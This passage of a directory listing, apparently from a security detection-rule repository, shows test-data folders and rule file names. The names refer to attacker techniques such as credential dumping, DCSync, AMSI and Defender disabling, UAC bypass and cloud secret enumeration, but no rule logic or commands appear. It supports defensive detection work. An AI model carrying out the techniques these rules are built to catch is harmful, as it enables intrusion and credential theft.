af491bca-e752-4b44-9c86-df5680533dbc.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_github_self_hosted_runner/ │ │ │ │ ├── 5bac7a56-da88-4c27-922e-c81e113b20cb.evtx │ │ │ │ ├── 5bac7a56-da88-4c27-922e-c81e113b20cb.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_gpresult_execution/ │ │ │ │ ├── e56d3073-83ff-4021-90fe-c658e0709e72.evtx │ │ │ │ ├── e56d3073-83ff-4021-90fe-c658e0709e72.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_hh_chm_execution/ │ │ │ │ ├── 68c8acb4-1b60-4890-8e82-3ddf7a6dba84.evtx │ │ │ │ ├── 68c8acb4-1b60-4890-8e82-3ddf7a6dba84.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_hktl_edr_freeze/ │ │ │ │ ├── c598cc0c-9e70-4852-b9eb-8921af79f598.evtx │ │ │ │ ├── c598cc0c-9e70-4852-b9eb-8921af79f598.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_hktl_wsass/ │ │ │ │ ├── 589ac73f-8e12-409c-964e-31a2f5775ae2.evtx │ │ │ │ ├── 589ac73f-8e12-409c-964e-31a2f5775ae2.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_hvci_registry_tampering/ │ │ │ │ ├── 6225c53a-a96e-4235-b28f-8d7997cd96eb.evtx │ │ │ │ ├── 6225c53a-a96e-4235-b28f-8d7997cd96eb.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_pua_adfind_enumeration/ │ │ │ │ ├── 455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx │ │ │ │ ├── 455b9d50-15a1-4b99-853f-8d37655a4c1b.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_pua_adfind_execution/ │ │ │ │ ├── 514e7e3e-b3b4-4a67-af60-be20f139198b.evtx │ │ │ │ ├── 514e7e3e-b3b4-4a67-af60-be20f139198b.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_pua_adfind_susp_usage/ │ │ │ │ ├── 9a132afa-654e-11eb-ae93-0242ac130002.evtx │ │ │ │ ├── 9a132afa-654e-11eb-ae93-0242ac130002.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_pua_advanced_ip_scanner/ │ │ │ │ ├── bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx │ │ │ │ ├── bef37fa2-f205-4a7b-b484-0759bfd5f86f.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_pua_advanced_port_scanner/ │ │ │ │ ├── 54773c5f-f1cc-4703-9126-2f797d96a69d.evtx │ │ │ │ ├── 
54773c5f-f1cc-4703-9126-2f797d96a69d.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_pua_advancedrun/ │ │ │ │ ├── d2b749ee-4225-417e-b20e-a8d2193cbb84.evtx │ │ │ │ ├── d2b749ee-4225-417e-b20e-a8d2193cbb84.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_pua_advancedrun_priv_user/ │ │ │ │ ├── fa00b701-44c6-4679-994d-5a18afa8a707.evtx │ │ │ │ ├── fa00b701-44c6-4679-994d-5a18afa8a707.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_pua_kdu_driver_tool/ │ │ │ │ ├── e76ca062-4de0-4d79-8d90-160a0d335eca.evtx │ │ │ │ ├── e76ca062-4de0-4d79-8d90-160a0d335eca.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_reg_add_run_key/ │ │ │ │ ├── de587dce-915e-4218-aac4-835ca6af6f70.evtx │ │ │ │ ├── de587dce-915e-4218-aac4-835ca6af6f70.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_reg_add_safeboot/ │ │ │ │ ├── d7662ff6-9e97-4596-a61d-9839e32dee8d.evtx │ │ │ │ ├── d7662ff6-9e97-4596-a61d-9839e32dee8d.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_reg_system_language_discovery/ │ │ │ │ ├── c43a5405-e8e1-4221-9ac9-dbe3fa14e886.evtx │ │ │ │ ├── c43a5405-e8e1-4221-9ac9-dbe3fa14e886.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_registry_special_accounts_hide_user/ │ │ │ │ ├── 9ec9fb1b-e059-4489-9642-f270c207923d.evtx │ │ │ │ ├── 9ec9fb1b-e059-4489-9642-f270c207923d.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_renamed_adfind/ │ │ │ │ ├── df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx │ │ │ │ ├── df55196f-f105-44d3-a675-e9dfb6cc2f2b.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_renamed_binary/ │ │ │ │ ├── 36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx │ │ │ │ ├── 36480ae1-a1cb-4eaa-a0d6-29801d7e9142.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_renamed_binary_highly_relevant/ │ │ │ │ ├── 0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx │ │ │ │ ├── 0ba1da6d-b6ce-4366-828c-18826c9de23e.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_renamed_curl/ │ │ │ │ ├── 7530cd3d-7671-43e3-b209-976966f6ea48.evtx │ │ │ │ ├── 
7530cd3d-7671-43e3-b209-976966f6ea48.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_renamed_ftp/ │ │ │ │ ├── 277a4393-446c-449a-b0ed-7fdc7795244c.evtx │ │ │ │ ├── 277a4393-446c-449a-b0ed-7fdc7795244c.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_renamed_msdt/ │ │ │ │ ├── bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx │ │ │ │ ├── bd1c6866-65fc-44b2-be51-5588fcff82b9.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_sc_stop_service/ │ │ │ │ ├── 81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx │ │ │ │ ├── 81bcb81b-5b1f-474b-b373-52c871aaa7b1.json │ │ │ │ ├── 81bcb81b-5b1f-474b-b373-52c871aaa7b1.jsoncls │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_susp_eventlog_content_recon/ │ │ │ │ ├── beaa66d6-aa1b-4e3c-80f5-e0145369bfaf.evtx │ │ │ │ ├── beaa66d6-aa1b-4e3c-80f5-e0145369bfaf.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_susp_system_exe_anomaly/ │ │ │ │ ├── e4a6b256-3e47-40fc-89d2-7a477edd6915.evtx │ │ │ │ ├── e4a6b256-3e47-40fc-89d2-7a477edd6915.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_svchost_masqueraded_execution/ │ │ │ │ ├── be58d2e2-06c8-4f58-b666-b99f6dc3b6cd.evtx │ │ │ │ ├── be58d2e2-06c8-4f58-b666-b99f6dc3b6cd.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_user_shell_folders_registry_modification/ │ │ │ │ ├── 8f3ab69a-aa22-4943-aa58-e0a52fdf6818.evtx │ │ │ │ ├── 8f3ab69a-aa22-4943-aa58-e0a52fdf6818.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_vulnerable_driver_blocklist_registry_tampering/ │ │ │ │ ├── 22154f0e-5132-4a54-aa78-cc62f6def531.evtx │ │ │ │ ├── 22154f0e-5132-4a54-aa78-cc62f6def531.json │ │ │ │ └── info.yml │ │ │ └── proc_creation_win_werfaultsecure_abuse/ │ │ │ ├── 1f0b4cac-9c81-41f4-95d0-8475ff46b3e2.evtx │ │ │ ├── 1f0b4cac-9c81-41f4-95d0-8475ff46b3e2.json │ │ │ └── info.yml │ │ ├── registry/ │ │ │ ├── registry_delete/ │ │ │ │ ├── registry_delete_disable_credential_guard/ │ │ │ │ │ ├── d645ef86-2396-48a1-a2b6-b629ca3f57ff.evtx │ │ │ │ │ ├── d645ef86-2396-48a1-a2b6-b629ca3f57ff.json │ │ │ │ │ └── 
info.yml │ │ │ │ ├── registry_delete_removal_amsi_registry_key/ │ │ │ │ │ ├── 41d1058a-aea7-4952-9293-29eaaf516465.evtx │ │ │ │ │ ├── 41d1058a-aea7-4952-9293-29eaaf516465.json │ │ │ │ │ └── info.yml │ │ │ │ ├── registry_delete_runmru/ │ │ │ │ │ ├── 3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.evtx │ │ │ │ │ ├── 3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.json │ │ │ │ │ └── info.yml │ │ │ │ ├── registry_delete_schtasks_hide_task_via_index_value_removal/ │ │ │ │ │ ├── 526cc8bc-1cdc-48ad-8b26-f19bff969cec.evtx │ │ │ │ │ ├── 526cc8bc-1cdc-48ad-8b26-f19bff969cec.json │ │ │ │ │ └── info.yml │ │ │ │ └── registry_delete_schtasks_hide_task_via_sd_value_removal/ │ │ │ │ ├── acd74772-5f88-45c7-956b-6a7b36c294d2.evtx │ │ │ │ ├── acd74772-5f88-45c7-956b-6a7b36c294d2.json │ │ │ │ └── info.yml │ │ │ ├── registry_event/ │ │ │ │ └── registry_event_add_local_hidden_user/ │ │ │ │ ├── 460479f3-80b7-42da-9c43-2cc1d54dbccd.evtx │ │ │ │ ├── 460479f3-80b7-42da-9c43-2cc1d54dbccd.json │ │ │ │ └── info.yml │ │ │ └── registry_set/ │ │ │ ├── registry_set_add_load_service_in_safe_mode/ │ │ │ │ ├── 1547e27c-3974-43e2-a7d7-7f484fb928ec.evtx │ │ │ │ ├── 1547e27c-3974-43e2-a7d7-7f484fb928ec.json │ │ │ │ └── info.yml │ │ │ ├── registry_set_add_port_monitor/ │ │ │ │ ├── 944e8941-f6f6-4ee8-ac05-1c224e923c0e.evtx │ │ │ │ ├── 944e8941-f6f6-4ee8-ac05-1c224e923c0e.json │ │ │ │ └── info.yml │ │ │ ├── registry_set_allow_rdp_remote_assistance_feature/ │ │ │ │ ├── 37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.evtx │ │ │ │ ├── 37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.json │ │ │ │ └── info.yml │ │ │ ├── registry_set_amsi_disable/ │ │ │ │ ├── aa37cbb0-da36-42cb-a90f-fdf216fc7467.evtx │ │ │ │ ├── aa37cbb0-da36-42cb-a90f-fdf216fc7467.json │ │ │ │ └── info.yml │ │ │ ├── registry_set_bypass_uac_using_delegateexecute/ │ │ │ │ ├── 46dd5308-4572-4d12-aa43-8938f0184d4f.evtx │ │ │ │ ├── 46dd5308-4572-4d12-aa43-8938f0184d4f.json │ │ │ │ └── info.yml │ │ │ ├── registry_set_bypass_uac_using_eventviewer/ │ │ │ │ ├── 
674202d0-b22a-4af4-ae5f-2eda1f3da1af.evtx │ │ │ │ ├── 674202d0-b22a-4af4-ae5f-2eda1f3da1af.json │ │ │ │ └── info.yml │ │ │ ├── registry_set_bypass_uac_using_silentcleanup_task/ │ │ │ │ ├── 724ea201-6514-4f38-9739-e5973c34f49a.evtx │ │ │ │ ├── 724ea201-6514-4f38-9739-e5973c34f49a.json │ │ │ │ └── info.yml │ │ │ ├── registry_set_change_rdp_port/ │ │ │ │ ├── 509e84b9-a71a-40e0-834f-05470369bd1e.evtx │ │ │ │ ├── 509e84b9-a71a-40e0-834f-05470369bd1e.json │ │ │ │ └── info.yml │ │ │ ├── registry_set_change_security_zones/ │ │ │ │ ├── 45e112d0-7759-4c2a-aa36-9f8fb79d3393.evtx │ │ │ │ ├── 45e112d0-7759-4c2a-aa36-9f8fb79d3393.json │ │ │ │ └── info.yml │ │ │ ├── registry_set_credential_guard_disabled/ │ │ │ │ ├── 73921b9c-cafd-4446-b0c6-fdb0ace42bc0.evtx │ │ │ │ ├── 73921b9c-cafd-4446-b0c6-fdb0ace42bc0.json │ │ │ │ └── info.yml │ │ │ ├── registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/ │ │ │ │ ├── 8b7273a4-ba5d-4d8a-b04f-11f2900d043a.evtx │ │ │ │ ├── 8b7273a4-ba5d-4d8a-b04f-11f2900d043a.json │ │ │ │ └── info.yml │ │ │ ├── registry_set_disable_administrative_share/ │ │ │ │ ├── c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.evtx │ │ │ │ ├── c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.json │ │ │ │ └── info.yml │ │ │ ├── registry_set_disable_defender_firewall/ │ │ │ │ ├── 974515da-6cc5-4c95-ae65-f97f9150ec7f.evtx │ │ │ │ ├── 974515da-6cc5-4c95-ae65-f97f9150ec7f.json │ │ │ │ └── info.yml │ │ │ ├── registry_set_disable_security_center_notifications/ │ │ │ │ ├── 3ae1a046-f7db-439d-b7ce-b8b366b81fa6.evtx │ │ │ │ ├── 3ae1a046-f7db-439d-b7ce-b8b366b81fa6.json │ │ │ │ └── info.yml │ │ │ ├── registry_set_persistence_amsi_providers/ │ │ │ │ ├── 33efc23c-6ea2-4503-8cfe-bdf82ce8f705.evtx │ │ │ │ ├── 33efc23c-6ea2-4503-8cfe-bdf82ce8f705.json │ │ │ │ └── info.yml │ │ │ ├── registry_set_persistence_com_key_linking/ │ │ │ │ ├── 9b0f8a61-91b2-464f-aceb-0527e0a45020.evtx │ │ │ │ ├── 9b0f8a61-91b2-464f-aceb-0527e0a45020.json │ │ │ │ └── info.yml │ │ │ ├── 
registry_set_persistence_logon_scripts_userinitmprlogonscript/ │ │ │ │ ├── 9ace0707-b560-49b8-b6ca-5148b42f39fb.evtx │ │ │ │ ├── 9ace0707-b560-49b8-b6ca-5148b42f39fb.json │ │ │ │ └── info.yml │ │ │ ├── registry_set_powershell_logging_disabled/ │ │ │ │ ├── fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.evtx │ │ │ │ ├── fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.json │ │ │ │ └── info.yml │ │ │ ├── registry_set_pua_sysinternals_execution_via_eula/ │ │ │ │ ├── 25ffa65d-76d8-4da5-a832-3f2b0136e133.evtx │ │ │ │ ├── 25ffa65d-76d8-4da5-a832-3f2b0136e133.json │ │ │ │ └── info.yml │ │ │ ├── registry_set_pua_sysinternals_renamed_execution_via_eula/ │ │ │ │ ├── f50f3c09-557d-492d-81db-9064a8d4e211.evtx │ │ │ │ ├── f50f3c09-557d-492d-81db-9064a8d4e211.json │ │ │ │ └── info.yml │ │ │ ├── registry_set_pua_sysinternals_susp_execution_via_eula/ │ │ │ │ ├── c7da8edc-49ae-45a2-9e61-9fd860e4e73d.evtx │ │ │ │ ├── c7da8edc-49ae-45a2-9e61-9fd860e4e73d.json │ │ │ │ └── info.yml │ │ │ ├── registry_set_special_accounts/ │ │ │ │ ├── f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.evtx │ │ │ │ ├── f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.json │ │ │ │ └── info.yml │ │ │ ├── registry_set_susp_user_shell_folders/ │ │ │ │ ├── 9c226817-8dc9-46c2-a58d-66655aafd7dc.evtx │ │ │ │ ├── 9c226817-8dc9-46c2-a58d-66655aafd7dc.json │ │ │ │ └── info.yml │ │ │ └── registry_set_vulnerable_driver_blocklist_disable/ │ │ │ ├── d526c60a-e236-4011-b165-831ffa52ab70.evtx │ │ │ ├── d526c60a-e236-4011-b165-831ffa52ab70.json │ │ │ └── info.yml │ │ └── sysmon/ │ │ └── sysmon_config_modification/ │ │ ├── 8ac03a65-6c84-4116-acad-dc1558ff7a77.evtx │ │ ├── 8ac03a65-6c84-4116-acad-dc1558ff7a77.json │ │ └── info.yml │ ├── rules-emerging-threats/ │ │ └── 2025/ │ │ ├── Exploits/ │ │ │ └── CVE-2025-55182/ │ │ │ └── proc_creation_win_exploit_cve_2025_55182_susp_nodejs_server_child_process/ │ │ │ ├── 271de298-cc0e-4842-acd8-079a0a99ea65.evtx │ │ │ ├── 271de298-cc0e-4842-acd8-079a0a99ea65.json │ │ │ └── info.yml │ │ └── Malware/ │ │ └── Grixba/ │ │ └── 
proc_creation_win_malware_grixba_recon/ │ │ ├── af688c76-4ce4-4309-bfdd-e896f01acf27.evtx │ │ ├── af688c76-4ce4-4309-bfdd-e896f01acf27.json │ │ └── info.yml │ └── rules-threat-hunting/ │ └── windows/ │ └── image_load/ │ └── image_load_win_werfaultsecure_dbgcore_dbghelp_load/ │ ├── 8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b.evtx │ ├── 8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b.json │ └── info.yml ├── rules/ │ ├── README.md │ ├── application/ │ │ ├── bitbucket/ │ │ │ └── audit/ │ │ │ ├── bitbucket_audit_full_data_export_triggered.yml │ │ │ ├── bitbucket_audit_global_permissions_change_detected.yml │ │ │ ├── bitbucket_audit_global_secret_scanning_rule_deleted.yml │ │ │ ├── bitbucket_audit_global_ssh_settings_change_detected.yml │ │ │ ├── bitbucket_audit_log_configuration_update_detected.yml │ │ │ ├── bitbucket_audit_project_secret_scanning_allowlist_added.yml │ │ │ ├── bitbucket_audit_secret_scanning_exempt_repository_detected.yml │ │ │ ├── bitbucket_audit_secret_scanning_rule_deleted.yml │ │ │ ├── bitbucket_audit_unauthorized_access_detected.yml │ │ │ ├── bitbucket_audit_unauthorized_full_data_export_triggered.yml │ │ │ ├── bitbucket_audit_user_details_export_attempt_detected.yml │ │ │ ├── bitbucket_audit_user_login_failure_detected.yml │ │ │ ├── bitbucket_audit_user_login_failure_via_ssh_detected.yml │ │ │ └── bitbucket_audit_user_permissions_export_attempt_detected.yml │ │ ├── django/ │ │ │ └── appframework_django_exceptions.yml │ │ ├── github/ │ │ │ └── audit/ │ │ │ ├── github_delete_action_invoked.yml │ │ │ ├── github_disable_high_risk_configuration.yml │ │ │ ├── github_disabled_outdated_dependency_or_vulnerability.yml │ │ │ ├── github_fork_private_repos_enabled_or_cleared.yml │ │ │ ├── github_new_org_member.yml │ │ │ ├── github_new_secret_created.yml │ │ │ ├── github_outside_collaborator_detected.yml │ │ │ ├── github_pages_site_changed_to_public.yml │ │ │ ├── github_push_protection_bypass_detected.yml │ │ │ ├── github_push_protection_disabled.yml │ │ │ ├── 
github_repo_or_org_transferred.yml │ │ │ ├── github_repository_archive_status_changed.yml │ │ │ ├── github_secret_scanning_feature_disabled.yml │ │ │ ├── github_self_hosted_runner_changes_detected.yml │ │ │ └── github_ssh_certificate_config_changed.yml │ │ ├── jvm/ │ │ │ ├── java_jndi_injection_exploitation_attempt.yml │ │ │ ├── java_local_file_read.yml │ │ │ ├── java_ognl_injection_exploitation_attempt.yml │ │ │ ├── java_rce_exploitation_attempt.yml │ │ │ └── java_xxe_exploitation_attempt.yml │ │ ├── kubernetes/ │ │ │ └── audit/ │ │ │ ├── kubernetes_audit_change_admission_controller.yml │ │ │ ├── kubernetes_audit_cronjob_modification.yml │ │ │ ├── kubernetes_audit_deployment_deleted.yml │ │ │ ├── kubernetes_audit_events_deleted.yml │ │ │ ├── kubernetes_audit_exec_into_container.yml │ │ │ ├── kubernetes_audit_hostpath_mount.yml │ │ │ ├── kubernetes_audit_pod_in_system_namespace.yml │ │ │ ├── kubernetes_audit_privileged_pod_creation.yml │ │ │ ├── kubernetes_audit_rbac_permisions_listing.yml │ │ │ ├── kubernetes_audit_rolebinding_modification.yml │ │ │ ├── kubernetes_audit_secrets_enumeration.yml │ │ │ ├── kubernetes_audit_secrets_modified_or_deleted.yml │ │ │ ├── kubernetes_audit_serviceaccount_creation.yml │ │ │ ├── kubernetes_audit_sidecar_injection.yml │ │ │ └── kubernetes_audit_unauthorized_unauthenticated_actions.yml │ │ ├── nodejs/ │ │ │ └── nodejs_rce_exploitation_attempt.yml │ │ ├── opencanary/ │ │ │ ├── opencanary_ftp_login_attempt.yml │ │ │ ├── opencanary_git_clone_request.yml │ │ │ ├── opencanary_http_get.yml │ │ │ ├── opencanary_http_post_login_attempt.yml │ │ │ ├── opencanary_httpproxy_login_attempt.yml │ │ │ ├── opencanary_mssql_login_sqlauth.yml │ │ │ ├── opencanary_mssql_login_winauth.yml │ │ │ ├── opencanary_mysql_login_attempt.yml │ │ │ ├── opencanary_ntp_monlist.yml │ │ │ ├── opencanary_portscan_nmap_fin_scan.yaml │ │ │ ├── opencanary_portscan_nmap_null_scan.yaml │ │ │ ├── opencanary_portscan_nmap_os_scan.yaml │ │ │ ├── 
opencanary_portscan_nmap_xmas_scan.yaml │ │ │ ├── opencanary_portscan_syn_scan.yaml │ │ │ ├── opencanary_rdp_connection_attempt.yaml │ │ │ ├── opencanary_redis_command.yml │ │ │ ├── opencanary_sip_request.yml │ │ │ ├── opencanary_smb_file_open.yml │ │ │ ├── opencanary_snmp_cmd.yml │ │ │ ├── opencanary_ssh_login_attempt.yml │ │ │ ├── opencanary_ssh_new_connection.yml │ │ │ ├── opencanary_telnet_login_attempt.yml │ │ │ ├── opencanary_tftp_request.yml │ │ │ └── opencanary_vnc_connection_attempt.yml │ │ ├── python/ │ │ │ └── app_python_sql_exceptions.yml │ │ ├── rpc_firewall/ │ │ │ ├── rpc_firewall_atsvc_lateral_movement.yml │ │ │ ├── rpc_firewall_atsvc_recon.yml │ │ │ ├── rpc_firewall_dcsync_attack.yml │ │ │ ├── rpc_firewall_efs_abuse.yml │ │ │ ├── rpc_firewall_eventlog_recon.yml │ │ │ ├── rpc_firewall_itaskschedulerservice_lateral_movement.yml │ │ │ ├── rpc_firewall_itaskschedulerservice_recon.yml │ │ │ ├── rpc_firewall_printing_lateral_movement.yml │ │ │ ├── rpc_firewall_remote_dcom_or_wmi.yml │ │ │ ├── rpc_firewall_remote_registry_lateral_movement.yml │ │ │ ├── rpc_firewall_remote_registry_recon.yml │ │ │ ├── rpc_firewall_remote_server_service_abuse.yml │ │ │ ├── rpc_firewall_remote_service_lateral_movement.yml │ │ │ ├── rpc_firewall_sasec_lateral_movement.yml │ │ │ ├── rpc_firewall_sasec_recon.yml │ │ │ ├── rpc_firewall_sharphound_recon_account.yml │ │ │ └── rpc_firewall_sharphound_recon_sessions.yml │ │ ├── ruby/ │ │ │ └── appframework_ruby_on_rails_exceptions.yml │ │ ├── spring/ │ │ │ ├── spring_application_exceptions.yml │ │ │ └── spring_spel_injection.yml │ │ ├── sql/ │ │ │ └── app_sqlinjection_errors.yml │ │ └── velocity/ │ │ └── velocity_ssti_injection.yml │ ├── category/ │ │ ├── antivirus/ │ │ │ ├── av_exploiting.yml │ │ │ ├── av_hacktool.yml │ │ │ ├── av_password_dumper.yml │ │ │ ├── av_ransomware.yml │ │ │ ├── av_relevant_files.yml │ │ │ └── av_webshell.yml │ │ └── database/ │ │ └── db_anomalous_query.yml │ ├── cloud/ │ │ ├── aws/ │ │ │ └── cloudtrail/ │ 
│ │ ├── aws_cloudtrail_bucket_deleted.yml │ │ │ ├── aws_cloudtrail_console_login_failed_authentication.yml │ │ │ ├── aws_cloudtrail_console_login_success_without_mfa.yml │ │ │ ├── aws_cloudtrail_disable_logging.yml │ │ │ ├── aws_cloudtrail_guardduty_detector_deleted_or_updated.yml │ │ │ ├── aws_cloudtrail_imds_malicious_usage.yml │ │ │ ├── aws_cloudtrail_new_acl_entries.yml │ │ │ ├── aws_cloudtrail_new_route_added.yml │ │ │ ├── aws_cloudtrail_pua_trufflehog.yml │ │ │ ├── aws_cloudtrail_region_enabled.yml │ │ │ ├── aws_cloudtrail_security_group_change_ingress_egress.yml │ │ │ ├── aws_cloudtrail_security_group_change_loadbalancer.yml │ │ │ ├── aws_cloudtrail_security_group_change_rds.yml │ │ │ ├── aws_cloudtrail_ssm_malicious_usage.yml │ │ │ ├── aws_cloudtrail_vpc_flow_logs_deleted.yml │ │ │ ├── aws_config_disable_recording.yml │ │ │ ├── aws_console_getsignintoken.yml │ │ │ ├── aws_delete_identity.yml │ │ │ ├── aws_delete_saml_provider.yml │ │ │ ├── aws_disable_bucket_versioning.yml │ │ │ ├── aws_ec2_disable_encryption.yml │ │ │ ├── aws_ec2_import_key_pair_activity.yml │ │ │ ├── aws_ec2_startup_script_change.yml │ │ │ ├── aws_ec2_vm_export_failure.yml │ │ │ ├── aws_ecs_task_definition_cred_endpoint_query.yml │ │ │ ├── aws_efs_fileshare_modified_or_deleted.yml │ │ │ ├── aws_efs_fileshare_mount_modified_or_deleted.yml │ │ │ ├── aws_eks_cluster_created_or_deleted.yml │ │ │ ├── aws_elasticache_security_group_created.yml │ │ │ ├── aws_elasticache_security_group_modified_or_deleted.yml │ │ │ ├── aws_enum_buckets.yml │ │ │ ├── aws_guardduty_disruption.yml │ │ │ ├── aws_iam_backdoor_users_keys.yml │ │ │ ├── aws_iam_s3browser_loginprofile_creation.yml │ │ │ ├── aws_iam_s3browser_templated_s3_bucket_policy_creation.yml │ │ │ ├── aws_iam_s3browser_user_or_accesskey_creation.yml │ │ │ ├── aws_kms_import_key_material.yml │ │ │ ├── aws_lambda_function_url.yml │ │ │ ├── aws_new_lambda_layer_attached.yml │ │ │ ├── aws_passed_role_to_glue_development_endpoint.yml │ │ │ ├── 
aws_rds_change_master_password.yml │ │ │ ├── aws_rds_dbcluster_actions.yml │ │ │ ├── aws_rds_public_db_restore.yml │ │ │ ├── aws_root_account_usage.yml │ │ │ ├── aws_route_53_domain_transferred_lock_disabled.yml │ │ │ ├── aws_route_53_domain_transferred_to_another_account.yml │ │ │ ├── aws_s3_data_management_tampering.yml │ │ │ ├── aws_securityhub_finding_evasion.yml │ │ │ ├── aws_snapshot_backup_exfiltration.yml │ │ │ ├── aws_sso_idp_change.yml │ │ │ ├── aws_sts_assumerole_misuse.yml │ │ │ ├── aws_sts_getcalleridentity_trufflehog.yml │ │ │ ├── aws_sts_getsessiontoken_misuse.yml │ │ │ ├── aws_susp_saml_activity.yml │ │ │ └── aws_update_login_profile.yml │ │ ├── azure/ │ │ │ ├── activity_logs/ │ │ │ │ ├── azure_aadhybridhealth_adfs_new_server.yml │ │ │ │ ├── azure_aadhybridhealth_adfs_service_delete.yml │ │ │ │ ├── azure_ad_user_added_to_admin_role.yml │ │ │ │ ├── azure_application_deleted.yml │ │ │ │ ├── azure_application_gateway_modified_or_deleted.yml │ │ │ │ ├── azure_application_security_group_modified_or_deleted.yml │ │ │ │ ├── azure_container_registry_created_or_deleted.yml │ │ │ │ ├── azure_creating_number_of_resources_detection.yml │ │ │ │ ├── azure_device_no_longer_managed_or_compliant.yml │ │ │ │ ├── azure_device_or_configuration_modified_or_deleted.yml │ │ │ │ ├── azure_dns_zone_modified_or_deleted.yml │ │ │ │ ├── azure_firewall_modified_or_deleted.yml │ │ │ │ ├── azure_firewall_rule_collection_modified_or_deleted.yml │ │ │ │ ├── azure_granting_permission_detection.yml │ │ │ │ ├── azure_keyvault_key_modified_or_deleted.yml │ │ │ │ ├── azure_keyvault_modified_or_deleted.yml │ │ │ │ ├── azure_keyvault_secrets_modified_or_deleted.yml │ │ │ │ ├── azure_kubernetes_admission_controller.yml │ │ │ │ ├── azure_kubernetes_cluster_created_or_deleted.yml │ │ │ │ ├── azure_kubernetes_cronjob.yml │ │ │ │ ├── azure_kubernetes_events_deleted.yml │ │ │ │ ├── azure_kubernetes_network_policy_change.yml │ │ │ │ ├── azure_kubernetes_pods_deleted.yml │ │ │ │ ├── 
azure_kubernetes_role_access.yml │ │ │ │ ├── azure_kubernetes_rolebinding_modified_or_deleted.yml │ │ │ │ ├── azure_kubernetes_secret_or_config_object_access.yml │ │ │ │ ├── azure_kubernetes_service_account_modified_or_deleted.yml │ │ │ │ ├── azure_mfa_disabled.yml │ │ │ │ ├── azure_network_firewall_policy_modified_or_deleted.yml │ │ │ │ ├── azure_network_firewall_rule_modified_or_deleted.yml │ │ │ │ ├── azure_network_p2s_vpn_modified_or_deleted.yml │ │ │ │ ├── azure_network_security_modified_or_deleted.yml │ │ │ │ ├── azure_network_virtual_device_modified_or_deleted.yml │ │ │ │ ├── azure_new_cloudshell_created.yml │ │ │ │ ├── azure_owner_removed_from_application_or_service_principal.yml │ │ │ │ ├── azure_rare_operations.yml │ │ │ │ ├── azure_service_principal_created.yml │ │ │ │ ├── azure_service_principal_removed.yml │ │ │ │ ├── azure_subscription_permissions_elevation_via_activitylogs.yml │ │ │ │ ├── azure_suppression_rule_created.yml │ │ │ │ ├── azure_virtual_network_modified_or_deleted.yml │ │ │ │ └── azure_vpn_connection_modified_or_deleted.yml │ │ │ ├── audit_logs/ │ │ │ │ ├── azure_aad_secops_ca_policy_removedby_bad_actor.yml │ │ │ │ ├── azure_aad_secops_ca_policy_updatedby_bad_actor.yml │ │ │ │ ├── azure_aad_secops_new_ca_policy_addedby_bad_actor.yml │ │ │ │ ├── azure_ad_account_created_deleted.yml │ │ │ │ ├── azure_ad_bitlocker_key_retrieval.yml │ │ │ │ ├── azure_ad_certificate_based_authencation_enabled.yml │ │ │ │ ├── azure_ad_device_registration_policy_changes.yml │ │ │ │ ├── azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml │ │ │ │ ├── azure_ad_new_root_ca_added.yml │ │ │ │ ├── azure_ad_users_added_to_device_admin_roles.yml │ │ │ │ ├── azure_app_appid_uri_changes.yml │ │ │ │ ├── azure_app_credential_added.yml │ │ │ │ ├── azure_app_delegated_permissions_all_users.yml │ │ │ │ ├── azure_app_end_user_consent.yml │ │ │ │ ├── azure_app_end_user_consent_blocked.yml │ │ │ │ ├── azure_app_owner_added.yml │ │ │ │ ├── 
